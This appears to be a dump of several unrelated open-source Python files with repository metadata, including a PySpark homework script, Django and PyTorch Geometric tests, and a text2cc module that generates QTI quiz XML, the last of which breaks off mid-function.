[ "MIT" ]
null
null
null
IntroToSpark/Assign4_Q1-6_action.py
petersontylerd/spark-courses
e8dcb4968ea31a50206739e6af3006889f8c3c6c
[ "MIT" ]
1
2021-03-26T11:47:37.000Z
2021-03-26T11:47:37.000Z
import csv from pyspark.sql import SparkSession from pyspark.sql.types import IntegerType spark = SparkSession.builder.appName("Assignment4").getOrCreate() sc = spark.sparkContext # load data to dataframe path = 'fake_data.csv' df = spark.read.format('csv').option('header','true').load(path) # cast income as an integer df = df.withColumn('Income', df['Income'].cast(IntegerType())) # Question 1 print('*' * 30) print('\nQuestion 1\n') print(df.rdd.map(lambda x: (x[1], x[0])).groupByKey().mapValues(lambda vals: len(set(vals))).sortBy(lambda a: a[1], ascending = False).take(1)) print('\n\n') # Question 2 print('*' * 30) print('\nQuestion 2\n') print(df.rdd.filter(lambda v: v[1] == 'United States of America').map(lambda x: (x[1], x[4])).groupByKey().mapValues(lambda x: sum(x) / len(x)).collect()) print('\n\n') # Question 3 print('*' * 30) print('\nQuestion 3\n') print(df.rdd.filter(lambda v: v[4] > 100000).filter(lambda v: v[7] == 'FALSE').count()) print('\n\n') # Question 4 print('*' * 30) print('\nQuestion 4\n') print(df.rdd.filter(lambda v: v[1] == 'United States of America').sortBy(lambda x: x[4], ascending = False).map(lambda x: (x[3], x[6], x[4], x[5])).take(10)) print('\n\n') # Question 5 print('*' * 30) print('\nQuestion 5\n') print(df.rdd.groupBy(lambda x: x[5]).count()) print('\n\n') # Question 6 print('*' * 30) print('\nQuestion 6\n') print(df.rdd.filter(lambda v: v[5] == 'Writer').filter(lambda x: x[4] < 100000).count()) print('\n\n')
26.017544
157
0.652057
246
1,483
3.926829
0.296748
0.050725
0.074534
0.130435
0.217391
0.175983
0.149068
0.149068
0.097308
0.097308
0
0.043511
0.116655
1,483
56
158
26.482143
0.693893
0.076871
0
0.375
0
0
0.163476
0
0
0
0
0
0
1
0
false
0
0.09375
0
0.09375
0.75
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
e6fc5742d6236482be2f3020d03479a9c33e3222
274
py
Python
src/firebot/tests/factories.py
zipmex/fire
a41bbdbc86085c055ae4706fadea4f142e881a85
[ "Apache-2.0" ]
52
2017-03-15T16:25:14.000Z
2022-03-01T16:50:14.000Z
src/firebot/tests/factories.py
zipmex/fire
a41bbdbc86085c055ae4706fadea4f142e881a85
[ "Apache-2.0" ]
239
2017-03-16T17:10:22.000Z
2022-03-06T07:24:24.000Z
src/firebot/tests/factories.py
zipmex/fire
a41bbdbc86085c055ae4706fadea4f142e881a85
[ "Apache-2.0" ]
8
2017-03-15T17:45:18.000Z
2022-01-26T14:51:03.000Z
import factory from django.contrib.auth import get_user_model class UserFactory(factory.DjangoModelFactory): class Meta: model = get_user_model() first_name = factory.Faker('name') last_name = factory.Faker('name') email = factory.Faker('email')
21.076923
46
0.715328
34
274
5.588235
0.529412
0.189474
0.126316
0.210526
0
0
0
0
0
0
0
0
0.182482
274
12
47
22.833333
0.848214
0
0
0
0
0
0.047445
0
0
0
0
0
0
1
0
false
0
0.25
0
0.875
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e6fc7870ccb1bbdefca5d31e7c6358dd9b6c9578
482
py
Python
reamber/o2jam/O2JHold.py
Bestfast/reamberPy
91b76ca6adf11fbe8b7cee7c186481776a4d7aaa
[ "MIT" ]
null
null
null
reamber/o2jam/O2JHold.py
Bestfast/reamberPy
91b76ca6adf11fbe8b7cee7c186481776a4d7aaa
[ "MIT" ]
null
null
null
reamber/o2jam/O2JHold.py
Bestfast/reamberPy
91b76ca6adf11fbe8b7cee7c186481776a4d7aaa
[ "MIT" ]
null
null
null
from dataclasses import dataclass, field from reamber.base.Hold import Hold, HoldTail from reamber.o2jam.O2JNoteMeta import O2JNoteMeta @dataclass class O2JHoldTail(HoldTail, O2JNoteMeta): pass @dataclass class O2JHold(Hold, O2JNoteMeta): """ Defines the O2Jam Bpm Object The O2Jam Bpm Object is stored in binary file .ojn """ _tail: O2JHoldTail = field(init=False) def _upcastTail(self, **kwargs) -> O2JHoldTail: return O2JHoldTail(**kwargs)
21.909091
54
0.73029
57
482
6.140351
0.578947
0.062857
0.062857
0.097143
0
0
0
0
0
0
0
0.030612
0.186722
482
21
55
22.952381
0.862245
0.165975
0
0.181818
0
0
0
0
0
0
0
0
0
1
0.090909
false
0.090909
0.272727
0.090909
0.727273
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc01bbc538287134d61e574ed4af064a81cfdf43
1,307
py
Python
test/utils/test_geodesic.py
shrey-bansal/pytorch_geometric
17108a08066b0a73530544d01719b186f2625ef2
[ "MIT" ]
2
2020-12-06T13:10:52.000Z
2021-07-06T06:50:10.000Z
test/utils/test_geodesic.py
shrey-bansal/pytorch_geometric
17108a08066b0a73530544d01719b186f2625ef2
[ "MIT" ]
null
null
null
test/utils/test_geodesic.py
shrey-bansal/pytorch_geometric
17108a08066b0a73530544d01719b186f2625ef2
[ "MIT" ]
1
2019-05-31T02:45:38.000Z
2019-05-31T02:45:38.000Z
from math import sqrt import torch from torch_geometric.utils import geodesic_distance def test_geodesic_distance(): pos = torch.Tensor([[0, 0, 0], [2, 0, 0], [0, 2, 0], [2, 2, 0]]) face = torch.tensor([[0, 1, 3], [0, 2, 3]]).t() out = geodesic_distance(pos, face) expected = [ [0, 1, 1, sqrt(2)], [1, 0, sqrt(2), 1], [1, sqrt(2), 0, 1], [sqrt(2), 1, 1, 0], ] assert torch.allclose(out, torch.tensor(expected)) assert torch.allclose(out, geodesic_distance(pos, face, num_workers=-1)) out = geodesic_distance(pos, face, norm=False) expected = [ [0, 2, 2, 2 * sqrt(2)], [2, 0, 2 * sqrt(2), 2], [2, 2 * sqrt(2), 0, 2], [2 * sqrt(2), 2, 2, 0], ] assert torch.allclose(out, torch.tensor(expected)) src = torch.tensor([0, 0, 0, 0]) dest = torch.tensor([0, 1, 2, 3]) out = geodesic_distance(pos, face, src=src, dest=dest) expected = [0, 1, 1, sqrt(2)] assert torch.allclose(out, torch.tensor(expected)) out = geodesic_distance(pos, face, src=src[0:1]) expected = [0, 1, 1, sqrt(2)] assert torch.allclose(out, torch.tensor(expected)) out = geodesic_distance(pos, face, dest=dest) expected = [0, 0, 0, 0] assert torch.allclose(out, torch.Tensor(expected))
30.395349
76
0.574598
202
1,307
3.663366
0.143564
0.027027
0.17973
0.178378
0.662162
0.467568
0.445946
0.394595
0.224324
0.224324
0
0.077778
0.24254
1,307
42
77
31.119048
0.669697
0
0
0.235294
0
0
0
0
0
0
0
0
0.176471
1
0.029412
false
0
0.088235
0
0.117647
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc021cb14dd8b84a0a6873924f2194048e2791f0
1,415
py
Python
forte/processors/tests/stanfordnlp_processor_test.py
tcl326/forte
d0d7b8b97da5e1d507dfa7cd4ec51d96067770b8
[ "Apache-2.0" ]
null
null
null
forte/processors/tests/stanfordnlp_processor_test.py
tcl326/forte
d0d7b8b97da5e1d507dfa7cd4ec51d96067770b8
[ "Apache-2.0" ]
null
null
null
forte/processors/tests/stanfordnlp_processor_test.py
tcl326/forte
d0d7b8b97da5e1d507dfa7cd4ec51d96067770b8
[ "Apache-2.0" ]
null
null
null
"""This module tests Stanford NLP processors.""" import os import unittest from texar.torch import HParams from forte.pipeline import Pipeline from forte.data.readers import StringReader from forte.processors.stanfordnlp_processor import StandfordNLPProcessor from ft.onto.base_ontology import Token, Sentence class TestStanfordNLPProcessor(unittest.TestCase): def setUp(self): self.stanford_nlp = Pipeline() self.stanford_nlp.set_reader(StringReader()) models_path = os.getcwd() config = HParams({ "processors": "tokenize", "lang": "en", # Language code for the language to build the Pipeline "use_gpu": False }, StandfordNLPProcessor.default_hparams()) self.stanford_nlp.add_processor(StandfordNLPProcessor(models_path), config=config) self.stanford_nlp.initialize() # TODO @unittest.skip("We need to test this without needing to download models " "everytime") def test_stanford_processor(self): sentences = ["This tool is called Forte.", "The goal of this project to help you build NLP " "pipelines.", "NLP has never been made this easy before."] document = ' '.join(sentences) pack = self.stanford_nlp.process(document) print(pack)
36.282051
77
0.638869
152
1,415
5.848684
0.552632
0.074241
0.084364
0
0
0
0
0
0
0
0
0
0.279859
1,415
38
78
37.236842
0.872424
0.071378
0
0
0
0
0.16909
0
0
0
0
0.026316
0
1
0.066667
false
0
0.233333
0
0.333333
0.033333
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
fc070f80801a319fdf697b23e027ce45aa2d558c
26,632
py
Python
text2cc/xml_assessment.py
dlehman83/text2cc
303798993590bceaeb5238a6cce82893c37cdfc7
[ "BSD-3-Clause" ]
1
2021-02-12T09:34:07.000Z
2021-02-12T09:34:07.000Z
text2cc/xml_assessment.py
dlehman83/text2cc
303798993590bceaeb5238a6cce82893c37cdfc7
[ "BSD-3-Clause" ]
null
null
null
text2cc/xml_assessment.py
dlehman83/text2cc
303798993590bceaeb5238a6cce82893c37cdfc7
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- # # Copyright (c) 2021, Dana Lehman # Copyright (c) 2020, Geoffrey M. Poore # All rights reserved. # # Licensed under the BSD 3-Clause License: # http://opensource.org/licenses/BSD-3-Clause # from .quiz import Quiz, Question, GroupStart, GroupEnd, TextRegion BEFORE_ITEMS = '''\ <?xml version="1.0" encoding="UTF-8"?> <questestinterop xmlns="http://www.imsglobal.org/xsd/ims_qtiasiv1p2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.imsglobal.org/xsd/ims_qtiasiv1p2 http://www.imsglobal.org/profile/cc/ccv1p2/ccv1p2_qtiasiv1p2p1_v1p0.xsd"> <assessment ident="{assessment_identifier}" title="{title}"> <qtimetadata> <qtimetadatafield> <fieldlabel>cc_maxattempts</fieldlabel> <fieldentry>1</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel> cc_profile </fieldlabel> <fieldentry> cc.exam.v0p1 </fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel> qmd_assessmenttype </fieldlabel> <fieldentry> Examination </fieldentry> </qtimetadatafield> </qtimetadata> <section ident="root_section"> ''' AFTER_ITEMS = '''\ </section> </assessment> </questestinterop> ''' GROUP_START = '''\ <section ident="{ident}" title="{group_title}"> <selection_ordering> <selection> <selection_number>{pick}</selection_number> <selection_extension> <points_per_item>{points_per_item}</points_per_item> </selection_extension> </selection> </selection_ordering> ''' GROUP_END = '''\ </section> ''' TEXT = '''\ <item ident="{ident}" title="{text_title_xml}"> <itemmetadata> <qtimetadata> <qtimetadatafield> <fieldlabel>cc_profile</fieldlabel> <fieldentry>text_only_question</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>points_possible</fieldlabel> <fieldentry>0</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>original_answer_ids</fieldlabel> <fieldentry></fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>assessment_question_identifierref</fieldlabel> <fieldentry>{assessment_question_identifierref}</fieldentry> </qtimetadatafield> </qtimetadata> </itemmetadata> <presentation> <material> <mattext texttype="text/html">{text_html_xml}</mattext> </material> </presentation> </item> ''' START_ITEM = '''\ <item ident="{question_identifier}" title="{question_title}"> ''' END_ITEM = '''\ </item> ''' ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM = '''\ <itemmetadata> <qtimetadata> <qtimetadatafield> <fieldlabel>cc_profile</fieldlabel> <fieldentry>{question_type}</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>points_possible</fieldlabel> <fieldentry>{points_possible}</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>original_answer_ids</fieldlabel> <fieldentry>{original_answer_ids}</fieldentry> </qtimetadatafield> <qtimetadatafield> <fieldlabel>assessment_question_identifierref</fieldlabel> <fieldentry>{assessment_question_identifierref}</fieldentry> </qtimetadatafield> </qtimetadata> </itemmetadata> ''' ITEM_METADATA_ESSAY = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM.replace('{original_answer_ids}', '') ITEM_METADATA_UPLOAD = ITEM_METADATA_ESSAY ITEM_PRESENTATION_MCTF = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_lid ident="response1" rcardinality="Single"> <render_choice> {choices} </render_choice> </response_lid> </presentation> ''' ITEM_PRESENTATION_MCTF_CHOICE = '''\ <response_label ident="{ident}"> <material> <mattext texttype="text/html">{choice_html_xml}</mattext> </material> </response_label>''' ITEM_PRESENTATION_MULTANS = ITEM_PRESENTATION_MCTF.replace('Single', 'Multiple') ITEM_PRESENTATION_MULTANS_CHOICE = ITEM_PRESENTATION_MCTF_CHOICE ITEM_PRESENTATION_SHORTANS = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_str ident="response1" rcardinality="Single"> <render_fib> <response_label ident="answer1" rshuffle="No"/> </render_fib> </response_str> </presentation> ''' ITEM_PRESENTATION_ESSAY = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_str ident="response1" rcardinality="Single"> <render_fib> <response_label ident="answer1" rshuffle="No"/> </render_fib> </response_str> </presentation> ''' ITEM_PRESENTATION_UPLOAD = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> </presentation> ''' ITEM_PRESENTATION_NUM = '''\ <presentation> <material> <mattext texttype="text/html">{question_html_xml}</mattext> </material> <response_str ident="response1" rcardinality="Single"> <render_fib fibtype="Decimal"> <response_label ident="answer1"/> </render_fib> </response_str> </presentation> ''' ITEM_RESPROCESSING_START = '''\ <resprocessing> <outcomes> <decvar maxvalue="100" minvalue="0" varname="SCORE" vartype="Decimal"/> </outcomes> ''' ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <other/> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="general_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <varequal respident="response1">{ident}</varequal> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <varequal respident="response1">{ident}</varequal> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <varequal respident="response1">{ident}</varequal> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <other/> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="general_incorrect_fb"/> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK = '''\ <respcondition continue="Yes"> <conditionvar> <varequal respident="response1">{answer_xml}</varequal> </conditionvar> <displayfeedback feedbacktype="Response" linkrefid="{ident}_fb"/> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> {varequal} </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> {varequal} </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL = '''\ <varequal respident="response1">{answer_xml}</varequal>''' ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK = ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <and> {varequal} </and> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <and> {varequal} </and> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT = '''\ <varequal respident="response1">{ident}</varequal>''' ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT = '''\ <not> <varequal respident="response1">{ident}</varequal> </not>''' ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK = ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <or> <varequal respident="response1">{num_exact}</varequal> <and> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </and> </or> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> <displayfeedback feedbacktype="Response" linkrefid="correct_fb"/> </respcondition> ''' ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK = '''\ <respcondition continue="No"> <conditionvar> <or> <varequal respident="response1">{num_exact}</varequal> <and> <vargte respident="response1">{num_min}</vargte> <varlte respident="response1">{num_max}</varlte> </and> </or> </conditionvar> <setvar action="Set" varname="SCORE">100</setvar> </respcondition> ''' ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK = ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK ITEM_RESPROCESSING_ESSAY = '''\ <respcondition continue="No"> <conditionvar> <other/> </conditionvar> </respcondition> ''' ITEM_RESPROCESSING_END = '''\ </resprocessing> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL = '''\ <itemfeedback ident="general_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT = '''\ <itemfeedback ident="correct_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT = '''\ <itemfeedback ident="general_incorrect_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INDIVIDUAL = '''\ <itemfeedback ident="{ident}_fb"> <flow_mat> <material> <mattext texttype="text/html">{feedback}</mattext> </material> </flow_mat> </itemfeedback> ''' def assessment(*, quiz: Quiz, assessment_identifier: str, title_xml: str) -> str: ''' Generate assessment XML from Quiz. ''' xml = [] xml.append(BEFORE_ITEMS.format(assessment_identifier=assessment_identifier, title=title_xml)) for question_or_delim in quiz.questions_and_delims: if isinstance(question_or_delim, TextRegion): xml.append(TEXT.format(ident=f'text2qti_text_{question_or_delim.id}', text_title_xml=question_or_delim.title_xml, assessment_question_identifierref=f'text2qti_question_ref_{question_or_delim.id}', text_html_xml=question_or_delim.text_html_xml)) continue if isinstance(question_or_delim, GroupStart): xml.append(GROUP_START.format(ident=f'text2qti_group_{question_or_delim.group.id}', group_title=question_or_delim.group.title_xml, pick=question_or_delim.group.pick, points_per_item=question_or_delim.group.points_per_question)) continue if isinstance(question_or_delim, GroupEnd): xml.append(GROUP_END) continue if not isinstance(question_or_delim, Question): raise TypeError question = question_or_delim xml.append(START_ITEM.format(question_identifier=f'text2qti_question_{question.id}', question_title=question.title_xml)) if question.type in ('true_false_question', 'multiple_choice_question', 'short_answer_question', 'multiple_answers_question'): item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM original_answer_ids = ','.join(f'text2qti_choice_{c.id}' for c in question.choices) elif question.type == 'numerical_question': item_metadata = ITEM_METADATA_MCTF_SHORTANS_MULTANS_NUM original_answer_ids = f'text2qti_numerical_{question.id}' elif question.type == 'essay_question': item_metadata = ITEM_METADATA_ESSAY original_answer_ids = f'text2qti_essay_{question.id}' elif question.type == 'file_upload_question': item_metadata = ITEM_METADATA_UPLOAD original_answer_ids = f'text2qti_upload_{question.id}' else: raise ValueError #Type Change for Schoology CC Import if question.type == 'multiple_choice_question': typechange = 'cc.multiple_choice.v0p1' elif question.type == 'true_false_question': typechange = 'cc.true_false.v0p1' elif question.type == 'short_answer_question': typechange = 'cc.fib.v0p1' elif question.type == 'multiple_answers_question': typechange = 'cc.multiple_response.v0p1' elif question.type == 'essay_question': typechange = 'cc.essay.v0p1' else: typechange = question.type xml.append(item_metadata.format(question_type=typechange, points_possible=question.points_possible, original_answer_ids=original_answer_ids, assessment_question_identifierref=f'text2qti_question_ref_{question.id}')) if question.type in ('true_false_question', 'multiple_choice_question', 'multiple_answers_question'): if question.type in ('true_false_question', 'multiple_choice_question'): item_presentation_choice = ITEM_PRESENTATION_MCTF_CHOICE item_presentation = ITEM_PRESENTATION_MCTF elif question.type == 'multiple_answers_question': item_presentation_choice = ITEM_PRESENTATION_MULTANS_CHOICE item_presentation = ITEM_PRESENTATION_MULTANS else: raise ValueError choices = '\n'.join(item_presentation_choice.format(ident=f'text2qti_choice_{c.id}', choice_html_xml=c.choice_html_xml) for c in question.choices) xml.append(item_presentation.format(question_html_xml=question.question_html_xml, choices=choices)) elif question.type == 'short_answer_question': xml.append(ITEM_PRESENTATION_SHORTANS.format(question_html_xml=question.question_html_xml)) elif question.type == 'numerical_question': xml.append(ITEM_PRESENTATION_NUM.format(question_html_xml=question.question_html_xml)) elif question.type == 'essay_question': xml.append(ITEM_PRESENTATION_ESSAY.format(question_html_xml=question.question_html_xml)) elif question.type == 'file_upload_question': xml.append(ITEM_PRESENTATION_UPLOAD.format(question_html_xml=question.question_html_xml)) else: raise ValueError if question.type in ('true_false_question', 'multiple_choice_question'): correct_choice = None for choice in question.choices: if choice.correct: correct_choice = choice break if correct_choice is None: raise TypeError resprocessing = [] resprocessing.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_GENERAL_FEEDBACK) for choice in question.choices: if choice.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}')) if question.correct_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_WITH_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}')) else: resprocessing.append(ITEM_RESPROCESSING_MCTF_SET_CORRECT_NO_FEEDBACK.format(ident=f'text2qti_choice_{correct_choice.id}')) if question.incorrect_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MCTF_INCORRECT_FEEDBACK) resprocessing.append(ITEM_RESPROCESSING_END) xml.extend(resprocessing) elif question.type == 'short_answer_question': resprocessing = [] resprocessing.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_GENERAL_FEEDBACK) for choice in question.choices: if choice.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}', answer_xml=choice.choice_xml)) varequal = [] for choice in question.choices: varequal.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_VAREQUAL.format(answer_xml=choice.choice_xml)) if question.correct_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal))) else: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal))) if question.incorrect_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_SHORTANS_INCORRECT_FEEDBACK) resprocessing.append(ITEM_RESPROCESSING_END) xml.extend(resprocessing) elif question.type == 'multiple_answers_question': resprocessing = [] resprocessing.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_GENERAL_FEEDBACK) for choice in question.choices: if choice.feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_CHOICE_FEEDBACK.format(ident=f'text2qti_choice_{choice.id}')) varequal = [] for choice in question.choices: if choice.correct: varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_CORRECT.format(ident=f'text2qti_choice_{choice.id}')) else: varequal.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_VAREQUAL_INCORRECT.format(ident=f'text2qti_choice_{choice.id}')) if question.correct_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_WITH_FEEDBACK.format(varequal='\n'.join(varequal))) else: resprocessing.append(ITEM_RESPROCESSING_MULTANS_SET_CORRECT_NO_FEEDBACK.format(varequal='\n'.join(varequal))) if question.incorrect_feedback_raw is not None: resprocessing.append(ITEM_RESPROCESSING_MULTANS_INCORRECT_FEEDBACK) resprocessing.append(ITEM_RESPROCESSING_END) xml.extend(resprocessing) elif question.type == 'numerical_question': xml.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: xml.append(ITEM_RESPROCESSING_NUM_GENERAL_FEEDBACK) if question.correct_feedback_raw is None: if question.numerical_exact is None: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_NO_FEEDBACK else: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_NO_FEEDBACK else: if question.numerical_exact is None: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_RANGE_SET_CORRECT_WITH_FEEDBACK else: item_resprocessing_num_set_correct = ITEM_RESPROCESSING_NUM_EXACT_SET_CORRECT_WITH_FEEDBACK xml.append(item_resprocessing_num_set_correct.format(num_min=question.numerical_min_html_xml, num_exact=question.numerical_exact_html_xml, num_max=question.numerical_max_html_xml)) if question.incorrect_feedback_raw is not None: xml.append(ITEM_RESPROCESSING_NUM_INCORRECT_FEEDBACK) xml.append(ITEM_RESPROCESSING_END) elif question.type == 'essay_question': xml.append(ITEM_RESPROCESSING_START) xml.append(ITEM_RESPROCESSING_ESSAY) if question.feedback_raw is not None: xml.append(ITEM_RESPROCESSING_ESSAY_GENERAL_FEEDBACK) xml.append(ITEM_RESPROCESSING_END) elif question.type == 'file_upload_question': xml.append(ITEM_RESPROCESSING_START) if question.feedback_raw is not None: xml.append(ITEM_RESPROCESSING_UPLOAD_GENERAL_FEEDBACK) xml.append(ITEM_RESPROCESSING_END) else: raise ValueError if question.type in ('true_false_question', 'multiple_choice_question', 'short_answer_question', 'multiple_answers_question', 'numerical_question', 'essay_question', 'file_upload_question'): if question.feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_GENERAL.format(feedback=question.feedback_html_xml)) if question.correct_feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_CORRECT.format(feedback=question.correct_feedback_html_xml)) if question.incorrect_feedback_raw is not None: xml.append(ITEM_FEEDBACK_MCTF_SHORTANS_MULTANS_NUM_INCORRECT.format(feedback=question.incorrect_feedback_html_xml)) if question.type in ('true_false_question', 'multiple_choice_question', 'short_answer_question', 'multiple_answers_question'): for choice in question.choices: if choice.feedback_raw is not None: 